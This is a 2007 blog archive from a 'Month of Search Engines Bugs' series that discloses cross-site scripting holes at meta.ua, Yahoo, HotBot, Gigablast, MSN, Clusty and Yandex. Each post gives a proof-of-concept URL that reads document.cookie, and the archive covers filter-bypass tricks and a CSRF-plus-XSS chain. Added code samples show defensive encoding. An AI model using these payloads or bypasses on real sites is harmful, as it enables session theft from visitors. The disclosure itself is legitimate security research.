Archive for category 'MOSEB'

MOSEB-07: Vulnerability at blogs.yandex.ru

18:54 07.06.2007

The next participant of the project is Yandex. It is the most popular Russian search engine.

The vulnerability is in Yandex blog search (blogs.yandex.ru), in the script for getting a button for your blog. Last time I wrote about Yandex blog search in the article New vulnerability at yandex.ru (the hole was in the blog ratings and was quickly fixed after I reported it). I found this Cross-Site Scripting hole on 17.03.2007, and it is DOM Based Cross-Site Scripting (XSS in the DOM).

XSS:

The vulnerability is in the id parameter:
http://blogs.yandex.ru/getbutton/?id='}alert(document.cookie);function a(n,h,w,type){//
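The payload above closes a string literal and a brace and then reopens a function a(n,h,w,type), which is the shape you get when a "get button" endpoint pastes the id parameter straight into generated JavaScript. The following is an added example, not Yandex's code: a hypothetical generator with that defect beside a safe way to embed an untrusted value in a JavaScript string context (the template, the id format and the function name are assumptions).

```javascript
// Added example, not Yandex's code. The template is a hypothetical reconstruction
// of a "get button" script generator; the id format below is an assumption.

// Constructed sample: the id value from the URL above.
const SAMPLE_ID = "'}alert(document.cookie);function a(n,h,w,type){//";

function buildButtonScriptUnsafe(id) {
  // Vulnerable: the untrusted id becomes part of the program text, so a quote in it
  // ends the string literal and everything after it is executed as code.
  return "function a(n,h,w,type){var id='" + id + "';document.write(h)}";
}

// Safe embedding for a JavaScript string context: JSON-encode the value, then also
// escape the characters that could close the surrounding <script> element or open
// an HTML comment, plus the two line terminators that JSON leaves unescaped.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function buildButtonScriptSafe(id) {
  // Defence in depth: a blog id is a short token (assumed format), so reject
  // anything else before it reaches the template at all.
  if (!/^[A-Za-z0-9_-]{1,64}$/.test(id)) {
    throw new Error("invalid id");
  }
  return "function a(n,h,w,type){var id=" + jsStringLiteral(id) + ";document.write(h)}";
}

// Regression check worth keeping in a test suite: the embedded literal must parse
// back to exactly the value that went in, i.e. it cannot have escaped the string.
function roundTrips(value) {
  return JSON.parse(jsStringLiteral(value)) === value;
}
```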

Moral: searching for blogs and getting buttons for blogs can be risky.

P.S.

I have also prepared other interesting holes concerning Yandex. So wait for today’s bonus post ;-) .

MOSEB-06: Vulnerabilities at clusty.com

21:07 06.06.2007

The next participant of the project is the Clusty search engine. It is a new and popular engine; it is a meta engine and uses clusters (it groups similar results into clusters).

There are two vulnerabilities at the main site of Clusty (clusty.com), in an error message. I found these Cross-Site Scripting and Full path disclosure holes on 24.05.2007. The XSS vulnerability works only in Mozilla and Firefox, but not in IE (due to the peculiarities of the IE rendering engine and the plaintext tag which the Clusty guys used).

XSS:

The vulnerability is in the v:file parameter:
http://clusty.com/search?v%3afile=viv_744%4025%3aTKjQZH&v%3astate=%28root%29%7croot%3C/plaintext%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Note that the value of the v:file parameter (viv_744%4025%3aTKjQZH) is temporary and works for a short time. So you need a fresh value for launching the attack (use Clusty for searching and get this value).

Full path disclosure:

http://clusty.com/search?v%3afile=viv_738%4020%3avyqK9v-

Moral: error messages at search engines can be dangerous.

MOSEB-05 Bonus: Vulnerabilities at autos.msn.com

22:51 05.06.2007

New bonus vulnerabilities at MSN. I found these Cross-Site Scripting holes on 02.06.2007, and they are also interesting XSS. I found them when I looked for other holes for the project, after Microsoft untimely fixed the one that I had prepared. Microsoft needs to behave properly (when participating in the project) and not do such lame things (holes need to be fixed at the right time).

The holes are at another MSN project (autos.msn.com), in the search functions (Car Dealer Listings and Used Car Listings). These two vulnerabilities are the same as MOSEB-05: Vulnerability at shopping.msn.com. These XSS holes are based on my Expressive comments space-hack filters bypass technique.

XSS:

The vulnerability is in the zip parameter (in both scripts):
http://autos.msn.com/newcar/default.aspx?zip=%22%3C/img%20style=%22xss:e/**/xpression(alert%20(document.cookie))%22%3E

Moral: searching for autos can be dangerous.

P.S.

About the Expressive comments filters bypass technique.

This technique (and its advanced version, Expressive comments space-hack filters bypass) is designed for XSS attacks. It makes XSS holes at .NET sites possible in the IE browser. It can be used to bypass .NET filters to carry out XSS attacks (these holes at MSN are just some examples).

You can read more about this technique at ha.ckers.org (about Arian Evans’ work; he developed the same technique independently of me). Owners of .NET sites need to take care of their projects and fix this type of vulnerability.

MOSEB-05: Vulnerability at shopping.msn.com

20:21 05.06.2007

The next participant of the project is MSN. It is the 3rd of the top search engines in the world (in this case the hole is in one of MSN’s projects). Last time I wrote about Microsoft’s search engine in the article Vulnerabilities at search.live.com.

The vulnerability is in the search at MSN Shopping (shopping.msn.com). I found this Cross-Site Scripting hole on 16.05.2007, and it is a very interesting hole.

There is only one point - Microsoft fixed this vulnerability before this official disclosure. When I checked this hole on the 1st of June, while I was sending notifications to search engine vendors, I found that MS had fixed this hole (which was planned for MOSEB). It was a bad move on their part, because when you are in the project, holes need to be fixed in time, not untimely. But I found two other holes at MSN (and they are still working), so MS will certainly be in my project (with working XSS).

XSS:

The vulnerability is in the text parameter:
http://shopping.msn.com/noresults/shp/?text=%3C/img%20style=%22xss:e/**/xpression(alert%20(document.cookie))%22%3E

I called this technique Expressive comments filters bypass (using the /**/ trick in expression). And it is an even more advanced technique, because MS filtered “alert(document.cookie)”, and I used a space between alert and the bracket - “alert%20(document.cookie)” (this is another variant of my space-hack technique, which I introduced in Month of MySpace Bugs in the MOMBY-00001011 bug). So I called it the Expressive comments space-hack filters bypass technique.
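The technique described here and in the "About Expressive comments filters bypass technique" P.S. of the MOSEB-05 Bonus post above works because the filter looks for fixed keywords. The following is an added example, not MSN's or Microsoft's code: a hypothetical keyword blacklist modelled on the filtering described (rejecting "expression(" and "alert(document.cookie)"), a normalisation step that a detection rule can use, and the actual fix, context-aware output encoding. The blacklist and the page template are assumptions, not the real .NET request filter or the real MSN page.

```javascript
// Added example, not MSN's or Microsoft's code. The blacklist and the reflecting
// page below are hypothetical; only the payload shape comes from the post.

// Constructed sample: the decoded text parameter from the URL above.
const SAMPLE_TEXT = '"</img style="xss:e/**/xpression(alert (document.cookie))">';

// A keyword blacklist of the kind this technique evades.
const BLOCKED = [/expression\s*\(/i, /alert\(document\.cookie\)/i];

function blacklistAllows(value) {
  return !BLOCKED.some(re => re.test(value));
}

// Detection-side improvement: strip CSS comments and whitespace before matching, so
// "e/**/xpression(" and "alert (" no longer slip past a WAF rule or IDS signature.
// Still a blacklist: the next evasion variant will need yet another rule.
function normalised(value) {
  return value.replace(/\/\*[\s\S]*?\*\//g, "").replace(/\s+/g, "");
}

// The actual fix: context-aware output encoding. In an HTML attribute, every
// character that could end the value or the tag is encoded, so the input can never
// become markup and the browser never sees a style attribute to evaluate.
function encodeForHtmlAttribute(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, ch => map[ch]);
}

// A page that reflects the search text into an attribute (assumed context),
// before and after the fix.
function renderTextUnsafe(text) {
  return '<img src="/noresults.gif" alt="' + text + '">';
}

function renderTextSafe(text) {
  return '<img src="/noresults.gif" alt="' + encodeForHtmlAttribute(text) + '">';
}
```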

Moral: searching for shopping can be dangerous.

P.S.

I have prepared two other holes at MSN. So wait for today’s bonus post ;-) Microsoft can’t hide from me; the time has come for vulnerabilities at their sites.

MOSEB-04: Vulnerability at www.gigablast.com

20:44 04.06.2007

The next participant of the project is the Gigablast search engine. It is one of the popular search engines (as I found out on the Internet).

The vulnerability is at Gigablast (www.gigablast.com), in the Add a Url script. I found this Cross-Site Scripting hole on 23.05.2007.

XSS:

The vulnerability is in the u parameter:
http://www.gigablast.com/addurl?u=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Also, the page with the HTML injection hole has PR5. So black SEO guys can be happy.

Moral: adding a URL to search engines can be dangerous.

MOSEB-03 Bonus: Persistent XSS at hotbot.com

21:50 03.06.2007

New bonus vulnerabilities at www.hotbot.com. I found these Cross-Site Scripting holes yesterday, 02.06.2007 (when I decided to make a bonus bug for you for the 3rd day of the project), and these are persistent XSS.

The holes are at the main domain of the search engine, http://www.hotbot.com, like MOSEB-03: Vulnerability at www.hotbot.com, but these vulnerabilities (two holes) are much more interesting. This is a complex CSRF + XSS attack which makes these persistent XSS work.

CSRF + XSS:

The vulnerability is in the prefs_filters.php script (in the dfi and dfe parameters), which is designed to save filters. And this function can be used to attack the engine’s visitors:
http://www.hotbot.com/prefs_filters.php?prov=ask&add_domain=on&dfi=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&save=web

First you use CSRF (for example via a frame or iframe tag) to save the XSS code (into the user’s cookie). And then the user must go to http://www.hotbot.com (you may trick him into visiting the site) to execute the XSS hole.

Moral: even visiting main page of search engine can be dangerous.

Note that HotBot belongs to Lycos. So Lycos is also responsible for these vulnerabilities.

MOSEB-03: Vulnerability at www.hotbot.com

19:16 03.06.2007

The next participant of the project is the HotBot search engine. It is one of the popular search engines, and it is a meta engine, so it uses the Ask and MSN engines directly for searching.

The vulnerability is in HotBot Web Search (www.hotbot.com). I found this Cross-Site Scripting hole on 23.05.2007.

XSS:

The vulnerability is in the query parameter:
http://www.hotbot.com/?query=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Also, the page with the HTML injection hole has PR8. It is a dream (and with me dreams come true). And this is the best choice for black SEO guys :-) .

Moral: searching in meta engines can be dangerous.

Note that HotBot belongs to Lycos. So Lycos is also responsible for this hole. And don’t worry guys, Lycos will also be in MOSEB.

P.S.

I have also prepared another (and more interesting) hole at www.hotbot.com. So wait for today’s bonus post ;-) .

MOSEB-02: Vulnerability at search.yahoo.com

18:36 02.06.2007

The next participant of the project is the Yahoo search engine. It is the 2nd of the top search engines in the world.

The vulnerability is in the Image Search of Yahoo! Search (http://images.search.yahoo.com). I found this Cross-Site Scripting hole on 08.04.2007.

XSS:

The vulnerability is in the rcurl parameter:
http://images.search.yahoo.com/search/images/view?rcurl=%22%20onLoad=%22javascript:alert(document.cookie)&rurl=test

Moral: searching for images can be dangerous.

MOSEB-01 Bonus: XSS at meta.ua

22:31 01.06.2007

New bonus vulnerability at meta.ua. I found this Cross-Site Scripting hole today, 01.06.2007.

The hole is at the main domain of the search engine, http://meta.ua, like MOSEB-01: Vulnerability at meta.ua, but in another script.

XSS:

The vulnerability is in the t parameter:
http://meta.ua/ua/topics.asp?t=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: browsing the list of sites in a search engine can be dangerous.

P.S.

The Meta guys need to fix today’s MOSEB holes, as they did last time with the vulnerabilities at horo.meta.ua (I posted about them 3 days ago). The search engine Meta.ua is a frequent guest in my news.

MOSEB-01: Vulnerability at meta.ua

19:24 01.06.2007

The Month of Search Engines Bugs has started.

The first participant of the project is the search engine meta.ua. The company Meta is a Ukrainian search engine vendor, and meta.ua is a leading Ukrainian engine.

As you can guess, I put Meta at the beginning of the participants’ list because it is my native engine (the single Ukrainian search engine in the list). And I care very much about the state of security of this engine.

The vulnerability which I present to you was already posted at my site before. The hole at the site of my native search engine, http://meta.ua, was found on 22.09.2006. There were two holes (in the q and url parameters), and I informed the Meta guys and they fixed those holes. But they did it incompletely. In one parameter the hole was left (with some query modification), so here it is.

XSS:

The vulnerability is in the url parameter:
http://meta.ua/search.asp?url=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Also, the page with the HTML injection hole has PR4. So it will be interesting for black SEO guys.

Moral: if I told you about holes at your site and you fixed them, try to fix them completely.

P.S.

This hole is old already, and for this reason I have prepared a new hole at meta.ua. So there will be a bonus post today ;-) .